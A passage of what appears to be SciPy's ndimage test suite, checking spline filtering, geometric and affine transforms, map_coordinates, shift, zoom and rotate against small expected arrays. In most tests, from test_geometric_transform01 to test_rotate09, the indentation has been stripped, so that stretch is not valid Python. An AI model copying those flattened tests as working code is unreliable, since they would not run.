    def test_fourier_ellipsoid_complex01(self):
        # Full-complex-FFT variant of test_fourier_ellipsoid_real01: total
        # real sum of the filtered impulse stays 1.
        for shape in [(32, 16), (31, 15)]:
            for type_, dec in zip([numpy.complex64, numpy.complex128],
                                  [5, 14]):
                a = numpy.zeros(shape, type_)
                a[0, 0] = 1.0
                a = fft.fft(a, shape[0], 0)
                a = fft.fft(a, shape[1], 1)
                # n=-1: axis 0 holds a full complex FFT, not an rfft half.
                a = ndimage.fourier_ellipsoid(a, [5.0, 2.5], -1, 0)
                a = fft.ifft(a, shape[1], 1)
                a = fft.ifft(a, shape[0], 0)
                assert_almost_equal(ndimage.sum(a.real), 1.0, decimal=dec)
    def test_spline01(self):
        # spline_filter of a 0-d constant input is the constant itself, for
        # every supported order (2-5) and dtype.
        for type_ in self.types:
            data = numpy.ones([], type_)
            for order in range(2, 6):
                out = ndimage.spline_filter(data, order=order)
                assert_array_almost_equal(out, 1)
    def test_spline02(self):
        # Single-element 1-d input: spline_filter must return it unchanged
        # for every supported order and dtype.
        for type_ in self.types:
            data = numpy.array([1], type_)
            for order in range(2, 6):
                out = ndimage.spline_filter(data, order=order)
                assert_array_almost_equal(out, [1])
    def test_spline03(self):
        # Same as test_spline01, but requesting the output dtype explicitly
        # via the `output` argument.
        for type_ in self.types:
            data = numpy.ones([], type_)
            for order in range(2, 6):
                out = ndimage.spline_filter(data, order,
                                            output=type_)
                assert_array_almost_equal(out, 1)
    def test_spline04(self):
        # Constant 1-d input of length 4: spline_filter must return all
        # ones for every supported order and dtype.
        for type_ in self.types:
            data = numpy.ones([4], type_)
            for order in range(2, 6):
                out = ndimage.spline_filter(data, order)
                assert_array_almost_equal(out, [1, 1, 1, 1])
    def test_spline05(self):
        # Constant 2-d input: spline_filter must return all ones for every
        # supported order and dtype.
        for type_ in self.types:
            data = numpy.ones([4, 4], type_)
            for order in range(2, 6):
                out = ndimage.spline_filter(data, order=order)
                assert_array_almost_equal(out, [[1, 1, 1, 1],
                                                [1, 1, 1, 1],
                                                [1, 1, 1, 1],
                                                [1, 1, 1, 1]])
def test_geometric_transform01(self):
data = numpy.array([1])
def mapping(x):
return x
for order in range(0, 6):
out = ndimage.geometric_transform(data, mapping, data.shape,
order=order)
assert_array_almost_equal(out, [1])
def test_geometric_transform02(self):
data = numpy.ones([4])
def mapping(x):
return x
for order in range(0, 6):
out = ndimage.geometric_transform(data, mapping, data.shape,
order=order)
assert_array_almost_equal(out, [1, 1, 1, 1])
def test_geometric_transform03(self):
data = numpy.ones([4])
def mapping(x):
return (x[0] - 1,)
for order in range(0, 6):
out = ndimage.geometric_transform(data, mapping, data.shape,
order=order)
assert_array_almost_equal(out, [0, 1, 1, 1])
def test_geometric_transform04(self):
data = numpy.array([4, 1, 3, 2])
def mapping(x):
return (x[0] - 1,)
for order in range(0, 6):
out = ndimage.geometric_transform(data, mapping, data.shape,
order=order)
assert_array_almost_equal(out, [0, 4, 1, 3])
def test_geometric_transform05(self):
data = numpy.array([[1, 1, 1, 1],
[1, 1, 1, 1],
[1, 1, 1, 1]])
def mapping(x):
return (x[0], x[1] - 1)
for order in range(0, 6):
out = ndimage.geometric_transform(data, mapping, data.shape,
order=order)
assert_array_almost_equal(out, [[0, 1, 1, 1],
[0, 1, 1, 1],
[0, 1, 1, 1]])
def test_geometric_transform06(self):
data = numpy.array([[4, 1, 3, 2],
[7, 6, 8, 5],
[3, 5, 3, 6]])
def mapping(x):
return (x[0], x[1] - 1)
for order in range(0, 6):
out = ndimage.geometric_transform(data, mapping, data.shape,
order=order)
assert_array_almost_equal(out, [[0, 4, 1, 3],
[0, 7, 6, 8],
[0, 3, 5, 3]])
def test_geometric_transform07(self):
data = numpy.array([[4, 1, 3, 2],
[7, 6, 8, 5],
[3, 5, 3, 6]])
def mapping(x):
return (x[0] - 1, x[1])
for order in range(0, 6):
out = ndimage.geometric_transform(data, mapping, data.shape,
order=order)
assert_array_almost_equal(out, [[0, 0, 0, 0],
[4, 1, 3, 2],
[7, 6, 8, 5]])
def test_geometric_transform08(self):
data = numpy.array([[4, 1, 3, 2],
[7, 6, 8, 5],
[3, 5, 3, 6]])
def mapping(x):
return (x[0] - 1, x[1] - 1)
for order in range(0, 6):
out = ndimage.geometric_transform(data, mapping, data.shape,
order=order)
assert_array_almost_equal(out, [[0, 0, 0, 0],
[0, 4, 1, 3],
[0, 7, 6, 8]])
def test_geometric_transform10(self):
data = numpy.array([[4, 1, 3, 2],
[7, 6, 8, 5],
[3, 5, 3, 6]])
def mapping(x):
return (x[0] - 1, x[1] - 1)
for order in range(0, 6):
if (order > 1):
filtered = ndimage.spline_filter(data, order=order)
else:
filtered = data
out = ndimage.geometric_transform(filtered, mapping, data.shape,
order=order, prefilter=False)
assert_array_almost_equal(out, [[0, 0, 0, 0],
[0, 4, 1, 3],
[0, 7, 6, 8]])
def test_geometric_transform13(self):
data = numpy.ones([2], numpy.float64)
def mapping(x):
return (x[0] // 2,)
for order in range(0, 6):
out = ndimage.geometric_transform(data, mapping, [4], order=order)
assert_array_almost_equal(out, [1, 1, 1, 1])
def test_geometric_transform14(self):
data = [1, 5, 2, 6, 3, 7, 4, 4]
def mapping(x):
return (2 * x[0],)
for order in range(0, 6):
out = ndimage.geometric_transform(data, mapping, [4], order=order)
assert_array_almost_equal(out, [1, 2, 3, 4])
def test_geometric_transform15(self):
data = [1, 2, 3, 4]
def mapping(x):
return (x[0] / 2,)
for order in range(0, 6):
out = ndimage.geometric_transform(data, mapping, [8], order=order)
assert_array_almost_equal(out[::2], [1, 2, 3, 4])
def test_geometric_transform16(self):
data = [[1, 2, 3, 4],
[5, 6, 7, 8],
[9.0, 10, 11, 12]]
def mapping(x):
return (x[0], x[1] * 2)
for order in range(0, 6):
out = ndimage.geometric_transform(data, mapping, (3, 2),
order=order)
assert_array_almost_equal(out, [[1, 3], [5, 7], [9, 11]])
def test_geometric_transform17(self):
data = [[1, 2, 3, 4],
[5, 6, 7, 8],
[9, 10, 11, 12]]
def mapping(x):
return (x[0] * 2, x[1])
for order in range(0, 6):
out = ndimage.geometric_transform(data, mapping, (1, 4),
order=order)
assert_array_almost_equal(out, [[1, 2, 3, 4]])
def test_geometric_transform18(self):
data = [[1, 2, 3, 4],
[5, 6, 7, 8],
[9, 10, 11, 12]]
def mapping(x):
return (x[0] * 2, x[1] * 2)
for order in range(0, 6):
out = ndimage.geometric_transform(data, mapping, (1, 2),
order=order)
assert_array_almost_equal(out, [[1, 3]])
def test_geometric_transform19(self):
data = [[1, 2, 3, 4],
[5, 6, 7, 8],
[9, 10, 11, 12]]
def mapping(x):
return (x[0], x[1] / 2)
for order in range(0, 6):
out = ndimage.geometric_transform(data, mapping, (3, 8),
order=order)
assert_array_almost_equal(out[..., ::2], data)
def test_geometric_transform20(self):
data = [[1, 2, 3, 4],
[5, 6, 7, 8],
[9, 10, 11, 12]]
def mapping(x):
return (x[0] / 2, x[1])
for order in range(0, 6):
out = ndimage.geometric_transform(data, mapping, (6, 4),
order=order)
assert_array_almost_equal(out[::2, ...], data)
def test_geometric_transform21(self):
data = [[1, 2, 3, 4],
[5, 6, 7, 8],
[9, 10, 11, 12]]
def mapping(x):
return (x[0] / 2, x[1] / 2)
for order in range(0, 6):
out = ndimage.geometric_transform(data, mapping, (6, 8),
order=order)
assert_array_almost_equal(out[::2, ::2], data)
def test_geometric_transform22(self):
data = numpy.array([[1, 2, 3, 4],
[5, 6, 7, 8],
[9, 10, 11, 12]], numpy.float64)
def mapping1(x):
return (x[0] / 2, x[1] / 2)
def mapping2(x):
return (x[0] * 2, x[1] * 2)
for order in range(0, 6):
out = ndimage.geometric_transform(data, mapping1,
(6, 8), order=order)
out = ndimage.geometric_transform(out, mapping2,
(3, 4), order=order)
assert_array_almost_equal(out, data)
def test_geometric_transform23(self):
data = [[1, 2, 3, 4],
[5, 6, 7, 8],
[9, 10, 11, 12]]
def mapping(x):
return (1, x[0] * 2)
for order in range(0, 6):
out = ndimage.geometric_transform(data, mapping, (2,), order=order)
out = out.astype(numpy.int32)
assert_array_almost_equal(out, [5, 7])
def test_geometric_transform24(self):
data = [[1, 2, 3, 4],
[5, 6, 7, 8],
[9, 10, 11, 12]]
def mapping(x, a, b):
return (a, x[0] * b)
for order in range(0, 6):
out = ndimage.geometric_transform(
data, mapping, (2,), order=order, extra_arguments=(1,),
extra_keywords={'b': 2})
assert_array_almost_equal(out, [5, 7])
def test_geometric_transform_endianness_with_output_parameter(self):
# geometric transform given output ndarray or dtype with
# non-native endianness. see issue #4127
data = numpy.array([1])
def mapping(x):
return x
for out in [data.dtype, data.dtype.newbyteorder(),
numpy.empty_like(data),
numpy.empty_like(data).astype(data.dtype.newbyteorder())]:
returned = ndimage.geometric_transform(data, mapping, data.shape,
output=out)
result = out if returned is None else returned
assert_array_almost_equal(result, [1])
def test_geometric_transform_with_string_output(self):
data = numpy.array([1])
def mapping(x):
return x
out = ndimage.geometric_transform(data, mapping, output='f')
assert_(out.dtype is numpy.dtype('f'))
assert_array_almost_equal(out, [1])
def test_map_coordinates01(self):
data = numpy.array([[4, 1, 3, 2],
[7, 6, 8, 5],
[3, 5, 3, 6]])
idx = numpy.indices(data.shape)
idx -= 1
for order in range(0, 6):
out = ndimage.map_coordinates(data, idx, order=order)
assert_array_almost_equal(out, [[0, 0, 0, 0],
[0, 4, 1, 3],
[0, 7, 6, 8]])
def test_map_coordinates02(self):
data = numpy.array([[4, 1, 3, 2],
[7, 6, 8, 5],
[3, 5, 3, 6]])
idx = numpy.indices(data.shape, numpy.float64)
idx -= 0.5
for order in range(0, 6):
out1 = ndimage.shift(data, 0.5, order=order)
out2 = ndimage.map_coordinates(data, idx, order=order)
assert_array_almost_equal(out1, out2)
def test_map_coordinates03(self):
data = numpy.array([[4, 1, 3, 2],
[7, 6, 8, 5],
[3, 5, 3, 6]], order='F')
idx = numpy.indices(data.shape) - 1
out = ndimage.map_coordinates(data, idx)
assert_array_almost_equal(out, [[0, 0, 0, 0],
[0, 4, 1, 3],
[0, 7, 6, 8]])
assert_array_almost_equal(out, ndimage.shift(data, (1, 1)))
idx = numpy.indices(data[::2].shape) - 1
out = ndimage.map_coordinates(data[::2], idx)
assert_array_almost_equal(out, [[0, 0, 0, 0],
[0, 4, 1, 3]])
assert_array_almost_equal(out, ndimage.shift(data[::2], (1, 1)))
idx = numpy.indices(data[:, ::2].shape) - 1
out = ndimage.map_coordinates(data[:, ::2], idx)
assert_array_almost_equal(out, [[0, 0], [0, 4], [0, 7]])
assert_array_almost_equal(out, ndimage.shift(data[:, ::2], (1, 1)))
def test_map_coordinates_endianness_with_output_parameter(self):
# output parameter given as array or dtype with either endianness
# see issue #4127
data = numpy.array([[1, 2], [7, 6]])
expected = numpy.array([[0, 0], [0, 1]])
idx = numpy.indices(data.shape)
idx -= 1
for out in [data.dtype, data.dtype.newbyteorder(), numpy.empty_like(expected),
numpy.empty_like(expected).astype(expected.dtype.newbyteorder())]:
returned = ndimage.map_coordinates(data, idx, output=out)
result = out if returned is None else returned
assert_array_almost_equal(result, expected)
def test_map_coordinates_with_string_output(self):
data = numpy.array([[1]])
idx = numpy.indices(data.shape)
out = ndimage.map_coordinates(data, idx, output='f')
assert_(out.dtype is numpy.dtype('f'))
assert_array_almost_equal(out, [[1]])
    @pytest.mark.skipif('win32' in sys.platform or numpy.intp(0).itemsize < 8,
                        reason="do not run on 32 bit or windows (no sparse memory)")
    def test_map_coordinates_large_data(self):
        # check crash on large data
        # The 30000**2 float32 array (~3.6 GB) is allocated but mostly never
        # touched; only the corner read by the coordinates is filled, so the
        # test relies on lazily committed virtual memory.
        try:
            n = 30000
            a = numpy.empty(n**2, dtype=numpy.float32).reshape(n, n)
            # fill the part we might read
            a[n-3:, n-3:] = 0
            ndimage.map_coordinates(a, [[n - 1.5], [n - 1.5]], order=1)
        except MemoryError as e:
            # NOTE(review): pytest.skip() raises internally, so the
            # `raise ... from e` chaining never actually applies -- confirm
            # whether a plain pytest.skip(...) call was intended.
            raise pytest.skip("Not enough memory available") from e
def test_affine_transform01(self):
data = numpy.array([1])
for order in range(0, 6):
out = ndimage.affine_transform(data, [[1]], order=order)
assert_array_almost_equal(out, [1])
def test_affine_transform02(self):
data = numpy.ones([4])
for order in range(0, 6):
out = ndimage.affine_transform(data, [[1]], order=order)
assert_array_almost_equal(out, [1, 1, 1, 1])
def test_affine_transform03(self):
data = numpy.ones([4])
for order in range(0, 6):
out = ndimage.affine_transform(data, [[1]], -1, order=order)
assert_array_almost_equal(out, [0, 1, 1, 1])
def test_affine_transform04(self):
data = numpy.array([4, 1, 3, 2])
for order in range(0, 6):
out = ndimage.affine_transform(data, [[1]], -1, order=order)
assert_array_almost_equal(out, [0, 4, 1, 3])
def test_affine_transform05(self):
data = numpy.array([[1, 1, 1, 1],
[1, 1, 1, 1],
[1, 1, 1, 1]])
for order in range(0, 6):
out = ndimage.affine_transform(data, [[1, 0], [0, 1]],
[0, -1], order=order)
assert_array_almost_equal(out, [[0, 1, 1, 1],
[0, 1, 1, 1],
[0, 1, 1, 1]])
def test_affine_transform06(self):
data = numpy.array([[4, 1, 3, 2],
[7, 6, 8, 5],
[3, 5, 3, 6]])
for order in range(0, 6):
out = ndimage.affine_transform(data, [[1, 0], [0, 1]],
[0, -1], order=order)
assert_array_almost_equal(out, [[0, 4, 1, 3],
[0, 7, 6, 8],
[0, 3, 5, 3]])
def test_affine_transform07(self):
data = numpy.array([[4, 1, 3, 2],
[7, 6, 8, 5],
[3, 5, 3, 6]])
for order in range(0, 6):
out = ndimage.affine_transform(data, [[1, 0], [0, 1]],
[-1, 0], order=order)
assert_array_almost_equal(out, [[0, 0, 0, 0],
[4, 1, 3, 2],
[7, 6, 8, 5]])
def test_affine_transform08(self):
data = numpy.array([[4, 1, 3, 2],
[7, 6, 8, 5],
[3, 5, 3, 6]])
for order in range(0, 6):
out = ndimage.affine_transform(data, [[1, 0], [0, 1]],
[-1, -1], order=order)
assert_array_almost_equal(out, [[0, 0, 0, 0],
[0, 4, 1, 3],
[0, 7, 6, 8]])
def test_affine_transform09(self):
data = numpy.array([[4, 1, 3, 2],
[7, 6, 8, 5],
[3, 5, 3, 6]])
for order in range(0, 6):
if (order > 1):
filtered = ndimage.spline_filter(data, order=order)
else:
filtered = data
out = ndimage.affine_transform(filtered, [[1, 0], [0, 1]],
[-1, -1], order=order,
prefilter=False)
assert_array_almost_equal(out, [[0, 0, 0, 0],
[0, 4, 1, 3],
[0, 7, 6, 8]])
def test_affine_transform10(self):
data = numpy.ones([2], numpy.float64)
for order in range(0, 6):
out = ndimage.affine_transform(data, [[0.5]], output_shape=(4,),
order=order)
assert_array_almost_equal(out, [1, 1, 1, 0])
def test_affine_transform11(self):
data = [1, 5, 2, 6, 3, 7, 4, 4]
for order in range(0, 6):
out = ndimage.affine_transform(data, [[2]], 0, (4,), order=order)
assert_array_almost_equal(out, [1, 2, 3, 4])
def test_affine_transform12(self):
data = [1, 2, 3, 4]
for order in range(0, 6):
out = ndimage.affine_transform(data, [[0.5]], 0, (8,), order=order)
assert_array_almost_equal(out[::2], [1, 2, 3, 4])
def test_affine_transform13(self):
data = [[1, 2, 3, 4],
[5, 6, 7, 8],
[9.0, 10, 11, 12]]
for order in range(0, 6):
out = ndimage.affine_transform(data, [[1, 0], [0, 2]], 0, (3, 2),
order=order)
assert_array_almost_equal(out, [[1, 3], [5, 7], [9, 11]])
def test_affine_transform14(self):
data = [[1, 2, 3, 4],
[5, 6, 7, 8],
[9, 10, 11, 12]]
for order in range(0, 6):
out = ndimage.affine_transform(data, [[2, 0], [0, 1]], 0, (1, 4),
order=order)
assert_array_almost_equal(out, [[1, 2, 3, 4]])
def test_affine_transform15(self):
data = [[1, 2, 3, 4],
[5, 6, 7, 8],
[9, 10, 11, 12]]
for order in range(0, 6):
out = ndimage.affine_transform(data, [[2, 0], [0, 2]], 0, (1, 2),
order=order)
assert_array_almost_equal(out, [[1, 3]])
def test_affine_transform16(self):
data = [[1, 2, 3, 4],
[5, 6, 7, 8],
[9, 10, 11, 12]]
for order in range(0, 6):
out = ndimage.affine_transform(data, [[1, 0.0], [0, 0.5]], 0,
(3, 8), order=order)
assert_array_almost_equal(out[..., ::2], data)
def test_affine_transform17(self):
data = [[1, 2, 3, 4],
[5, 6, 7, 8],
[9, 10, 11, 12]]
for order in range(0, 6):
out = ndimage.affine_transform(data, [[0.5, 0], [0, 1]], 0,
(6, 4), order=order)
assert_array_almost_equal(out[::2, ...], data)
def test_affine_transform18(self):
data = [[1, 2, 3, 4],
[5, 6, 7, 8],
[9, 10, 11, 12]]
for order in range(0, 6):
out = ndimage.affine_transform(data, [[0.5, 0], [0, 0.5]], 0,
(6, 8), order=order)
assert_array_almost_equal(out[::2, ::2], data)
def test_affine_transform19(self):
data = numpy.array([[1, 2, 3, 4],
[5, 6, 7, 8],
[9, 10, 11, 12]], numpy.float64)
for order in range(0, 6):
out = ndimage.affine_transform(data, [[0.5, 0], [0, 0.5]], 0,
(6, 8), order=order)
out = ndimage.affine_transform(out, [[2.0, 0], [0, 2.0]], 0,
(3, 4), order=order)
assert_array_almost_equal(out, data)
def test_affine_transform20(self):
data = [[1, 2, 3, 4],
[5, 6, 7, 8],
[9, 10, 11, 12]]
for order in range(0, 6):
out = ndimage.affine_transform(data, [[0], [2]], 0, (2,),
order=order)
assert_array_almost_equal(out, [1, 3])
def test_affine_transform21(self):
data = [[1, 2, 3, 4],
[5, 6, 7, 8],
[9, 10, 11, 12]]
for order in range(0, 6):
out = ndimage.affine_transform(data, [[2], [0]], 0, (2,),
order=order)
assert_array_almost_equal(out, [1, 9])
def test_affine_transform22(self):
# shift and offset interaction; see issue #1547
data = numpy.array([4, 1, 3, 2])
for order in range(0, 6):
out = ndimage.affine_transform(data, [[2]], [-1], (3,),
order=order)
assert_array_almost_equal(out, [0, 1, 2])
def test_affine_transform23(self):
# shift and offset interaction; see issue #1547
data = numpy.array([4, 1, 3, 2])
for order in range(0, 6):
out = ndimage.affine_transform(data, [[0.5]], [-1], (8,),
order=order)
assert_array_almost_equal(out[::2], [0, 4, 1, 3])
def test_affine_transform24(self):
# consistency between diagonal and non-diagonal case; see issue #1547
data = numpy.array([4, 1, 3, 2])
for order in range(0, 6):
with suppress_warnings() as sup:
sup.filter(UserWarning,
"The behavior of affine_transform with a 1-D array .* has changed")
out1 = ndimage.affine_transform(data, [2], -1, order=order)
out2 = ndimage.affine_transform(data, [[2]], -1, order=order)
assert_array_almost_equal(out1, out2)
def test_affine_transform25(self):
# consistency between diagonal and non-diagonal case; see issue #1547
data = numpy.array([4, 1, 3, 2])
for order in range(0, 6):
with suppress_warnings() as sup:
sup.filter(UserWarning,
"The behavior of affine_transform with a 1-D array .* has changed")
out1 = ndimage.affine_transform(data, [0.5], -1, order=order)
out2 = ndimage.affine_transform(data, [[0.5]], -1, order=order)
assert_array_almost_equal(out1, out2)
def test_affine_transform26(self):
# test homogeneous coordinates
data = numpy.array([[4, 1, 3, 2],
[7, 6, 8, 5],
[3, 5, 3, 6]])
for order in range(0, 6):
if (order > 1):
filtered = ndimage.spline_filter(data, order=order)
else:
filtered = data
tform_original = numpy.eye(2)
offset_original = -numpy.ones((2, 1))
tform_h1 = numpy.hstack((tform_original, offset_original))
tform_h2 = numpy.vstack((tform_h1, [[0, 0, 1]]))
out1 = ndimage.affine_transform(filtered, tform_original,
offset_original.ravel(),
order=order, prefilter=False)
out2 = ndimage.affine_transform(filtered, tform_h1, order=order,
prefilter=False)
out3 = ndimage.affine_transform(filtered, tform_h2, order=order,
prefilter=False)
for out in [out1, out2, out3]:
assert_array_almost_equal(out, [[0, 0, 0, 0],
[0, 4, 1, 3],
[0, 7, 6, 8]])
def test_affine_transform27(self):
# test valid homogeneous transformation matrix
data = numpy.array([[4, 1, 3, 2],
[7, 6, 8, 5],
[3, 5, 3, 6]])
tform_h1 = numpy.hstack((numpy.eye(2), -numpy.ones((2, 1))))
tform_h2 = numpy.vstack((tform_h1, [[5, 2, 1]]))
assert_raises(ValueError, ndimage.affine_transform, data, tform_h2)
def test_affine_transform_1d_endianness_with_output_parameter(self):
# 1d affine transform given output ndarray or dtype with
# either endianness. see issue #7388
data = numpy.ones((2, 2))
for out in [numpy.empty_like(data),
numpy.empty_like(data).astype(data.dtype.newbyteorder()),
data.dtype, data.dtype.newbyteorder()]:
with suppress_warnings() as sup:
sup.filter(UserWarning,
"The behavior of affine_transform with a 1-D array .* has changed")
returned = ndimage.affine_transform(data, [1, 1], output=out)
result = out if returned is None else returned
assert_array_almost_equal(result, [[1, 1], [1, 1]])
def test_affine_transform_multi_d_endianness_with_output_parameter(self):
# affine transform given output ndarray or dtype with either endianness
# see issue #4127
data = numpy.array([1])
for out in [data.dtype, data.dtype.newbyteorder(),
numpy.empty_like(data),
numpy.empty_like(data).astype(data.dtype.newbyteorder())]:
returned = ndimage.affine_transform(data, [[1]], output=out)
result = out if returned is None else returned
assert_array_almost_equal(result, [1])
def test_affine_transform_with_string_output(self):
data = numpy.array([1])
out = ndimage.affine_transform(data, [[1]], output='f')
assert_(out.dtype is numpy.dtype('f'))
assert_array_almost_equal(out, [1])
def test_shift01(self):
data = numpy.array([1])
for order in range(0, 6):
out = ndimage.shift(data, [1], order=order)
assert_array_almost_equal(out, [0])
def test_shift02(self):
data = numpy.ones([4])
for order in range(0, 6):
out = ndimage.shift(data, [1], order=order)
assert_array_almost_equal(out, [0, 1, 1, 1])
def test_shift03(self):
data = numpy.ones([4])
for order in range(0, 6):
out = ndimage.shift(data, -1, order=order)
assert_array_almost_equal(out, [1, 1, 1, 0])
def test_shift04(self):
data = numpy.array([4, 1, 3, 2])
for order in range(0, 6):
out = ndimage.shift(data, 1, order=order)
assert_array_almost_equal(out, [0, 4, 1, 3])
def test_shift05(self):
data = numpy.array([[1, 1, 1, 1],
[1, 1, 1, 1],
[1, 1, 1, 1]])
for order in range(0, 6):
out = ndimage.shift(data, [0, 1], order=order)
assert_array_almost_equal(out, [[0, 1, 1, 1],
[0, 1, 1, 1],
[0, 1, 1, 1]])
def test_shift06(self):
data = numpy.array([[4, 1, 3, 2],
[7, 6, 8, 5],
[3, 5, 3, 6]])
for order in range(0, 6):
out = ndimage.shift(data, [0, 1], order=order)
assert_array_almost_equal(out, [[0, 4, 1, 3],
[0, 7, 6, 8],
[0, 3, 5, 3]])
def test_shift07(self):
data = numpy.array([[4, 1, 3, 2],
[7, 6, 8, 5],
[3, 5, 3, 6]])
for order in range(0, 6):
out = ndimage.shift(data, [1, 0], order=order)
assert_array_almost_equal(out, [[0, 0, 0, 0],
[4, 1, 3, 2],
[7, 6, 8, 5]])
def test_shift08(self):
data = numpy.array([[4, 1, 3, 2],
[7, 6, 8, 5],
[3, 5, 3, 6]])
for order in range(0, 6):
out = ndimage.shift(data, [1, 1], order=order)
assert_array_almost_equal(out, [[0, 0, 0, 0],
[0, 4, 1, 3],
[0, 7, 6, 8]])
def test_shift09(self):
data = numpy.array([[4, 1, 3, 2],
[7, 6, 8, 5],
[3, 5, 3, 6]])
for order in range(0, 6):
if (order > 1):
filtered = ndimage.spline_filter(data, order=order)
else:
filtered = data
out = ndimage.shift(filtered, [1, 1], order=order, prefilter=False)
assert_array_almost_equal(out, [[0, 0, 0, 0],
[0, 4, 1, 3],
[0, 7, 6, 8]])
def test_zoom1(self):
for order in range(0, 6):
for z in [2, [2, 2]]:
arr = numpy.array(list(range(25))).reshape((5, 5)).astype(float)
arr = ndimage.zoom(arr, z, order=order)
assert_equal(arr.shape, (10, 10))
assert_(numpy.all(arr[-1, :] != 0))
assert_(numpy.all(arr[-1, :] >= (20 - eps)))
assert_(numpy.all(arr[0, :] <= (5 + eps)))
assert_(numpy.all(arr >= (0 - eps)))
assert_(numpy.all(arr <= (24 + eps)))
def test_zoom2(self):
arr = numpy.arange(12).reshape((3, 4))
out = ndimage.zoom(ndimage.zoom(arr, 2), 0.5)
assert_array_equal(out, arr)
def test_zoom3(self):
arr = numpy.array([[1, 2]])
out1 = ndimage.zoom(arr, (2, 1))
out2 = ndimage.zoom(arr, (1, 2))
assert_array_almost_equal(out1, numpy.array([[1, 2], [1, 2]]))
assert_array_almost_equal(out2, numpy.array([[1, 1, 2, 2]]))
def test_zoom_affine01(self):
data = [[1, 2, 3, 4],
[5, 6, 7, 8],
[9, 10, 11, 12]]
for order in range(0, 6):
with suppress_warnings() as sup:
sup.filter(UserWarning,
"The behavior of affine_transform with a 1-D array .* has changed")
out = ndimage.affine_transform(data, [0.5, 0.5], 0,
(6, 8), order=order)
assert_array_almost_equal(out[::2, ::2], data)
def test_zoom_infinity(self):
# Ticket #1419 regression test
dim = 8
ndimage.zoom(numpy.zeros((dim, dim)), 1./dim, mode='nearest')
def test_zoom_zoomfactor_one(self):
# Ticket #1122 regression test
arr = numpy.zeros((1, 5, 5))
zoom = (1.0, 2.0, 2.0)
out = ndimage.zoom(arr, zoom, cval=7)
ref = numpy.zeros((1, 10, 10))
assert_array_almost_equal(out, ref)
def test_zoom_output_shape_roundoff(self):
arr = numpy.zeros((3, 11, 25))
zoom = (4.0 / 3, 15.0 / 11, 29.0 / 25)
out = ndimage.zoom(arr, zoom)
assert_array_equal(out.shape, (4, 15, 29))
def test_rotate01(self):
data = numpy.array([[0, 0, 0, 0],
[0, 1, 1, 0],
[0, 0, 0, 0]], dtype=numpy.float64)
for order in range(0, 6):
out = ndimage.rotate(data, 0)
assert_array_almost_equal(out, data)
def test_rotate02(self):
data = numpy.array([[0, 0, 0, 0],
[0, 1, 0, 0],
[0, 0, 0, 0]], dtype=numpy.float64)
expected = numpy.array([[0, 0, 0],
[0, 0, 0],
[0, 1, 0],
[0, 0, 0]], dtype=numpy.float64)
for order in range(0, 6):
out = ndimage.rotate(data, 90)
assert_array_almost_equal(out, expected)
def test_rotate03(self):
data = numpy.array([[0, 0, 0, 0, 0],
[0, 1, 1, 0, 0],
[0, 0, 0, 0, 0]], dtype=numpy.float64)
expected = numpy.array([[0, 0, 0],
[0, 0, 0],
[0, 1, 0],
[0, 1, 0],
[0, 0, 0]], dtype=numpy.float64)
for order in range(0, 6):
out = ndimage.rotate(data, 90)
assert_array_almost_equal(out, expected)
def test_rotate04(self):
data = numpy.array([[0, 0, 0, 0, 0],
[0, 1, 1, 0, 0],
[0, 0, 0, 0, 0]], dtype=numpy.float64)
expected = numpy.array([[0, 0, 0, 0, 0],
[0, 0, 1, 0, 0],
[0, 0, 1, 0, 0]], dtype=numpy.float64)
for order in range(0, 6):
out = ndimage.rotate(data, 90, reshape=False)
assert_array_almost_equal(out, expected)
def test_rotate05(self):
data = numpy.empty((4, 3, 3))
for i in range(3):
data[:, :, i] = numpy.array([[0, 0, 0],
[0, 1, 0],
[0, 1, 0],
[0, 0, 0]], dtype=numpy.float64)
expected = numpy.array([[0, 0, 0, 0],
[0, 1, 1, 0],
[0, 0, 0, 0]], dtype=numpy.float64)
for order in range(0, 6):
out = ndimage.rotate(data, 90)
for i in range(3):
assert_array_almost_equal(out[:, :, i], expected)
def test_rotate06(self):
data = numpy.empty((3, 4, 3))
for i in range(3):
data[:, :, i] = numpy.array([[0, 0, 0, 0],
[0, 1, 1, 0],
[0, 0, 0, 0]], dtype=numpy.float64)
expected = numpy.array([[0, 0, 0],
[0, 1, 0],
[0, 1, 0],
[0, 0, 0]], dtype=numpy.float64)
for order in range(0, 6):
out = ndimage.rotate(data, 90)
for i in range(3):
assert_array_almost_equal(out[:, :, i], expected)
def test_rotate07(self):
data = numpy.array([[[0, 0, 0, 0, 0],
[0, 1, 1, 0, 0],
[0, 0, 0, 0, 0]]] * 2, dtype=numpy.float64)
data = data.transpose()
expected = numpy.array([[[0, 0, 0],
[0, 1, 0],
[0, 1, 0],
[0, 0, 0],
[0, 0, 0]]] * 2, dtype=numpy.float64)
expected = expected.transpose([2, 1, 0])
for order in range(0, 6):
out = ndimage.rotate(data, 90, axes=(0, 1))
assert_array_almost_equal(out, expected)
def test_rotate08(self):
data = numpy.array([[[0, 0, 0, 0, 0],
[0, 1, 1, 0, 0],
[0, 0, 0, 0, 0]]] * 2, dtype=numpy.float64)
data = data.transpose()
expected = numpy.array([[[0, 0, 1, 0, 0],
[0, 0, 1, 0, 0],
[0, 0, 0, 0, 0]]] * 2, dtype=numpy.float64)
expected = expected.transpose()
for order in range(0, 6):
out = ndimage.rotate(data, 90, axes=(0, 1), reshape=False)
assert_array_almost_equal(out, expected)
def test_rotate09(self):
data = numpy.array([[0, 0, 0, 0, 0],
[0, 1, 1, 0, 0],
[0, 0, 0, 0, 0]] * 2, dtype=numpy.float64)
with assert_raises(ValueError):
ndimage.rotate(data, 90, axes=(0, data.ndim))
    def test_rotate10(self):
        # 12-degree rotation of a 3x5x3 ramp with reshape=False; samples that
        # map outside the input come back as 0 (see the zeroed corner rows)
        data = numpy.arange(45, dtype=numpy.float64).reshape((3, 5, 3))
        # The output of ndimage.rotate before refactoring
        expected = numpy.array([[[0.0, 0.0, 0.0],
                                 [0.0, 0.0, 0.0],
                                 [6.54914793, 7.54914793, 8.54914793],
                                 [10.84520162, 11.84520162, 12.84520162],
                                 [0.0, 0.0, 0.0]],
                                [[6.19286575, 7.19286575, 8.19286575],
                                 [13.4730712, 14.4730712, 15.4730712],
                                 [21.0, 22.0, 23.0],
                                 [28.5269288, 29.5269288, 30.5269288],
                                 [35.80713425, 36.80713425, 37.80713425]],
                                [[0.0, 0.0, 0.0],
                                 [31.15479838, 32.15479838, 33.15479838],
                                 [35.45085207, 36.45085207, 37.45085207],
                                 [0.0, 0.0, 0.0],
                                 [0.0, 0.0, 0.0]]])
        out = ndimage.rotate(data, angle=12, reshape=False)
        assert_array_almost_equal(out, expected)
    def test_watershed_ift01(self):
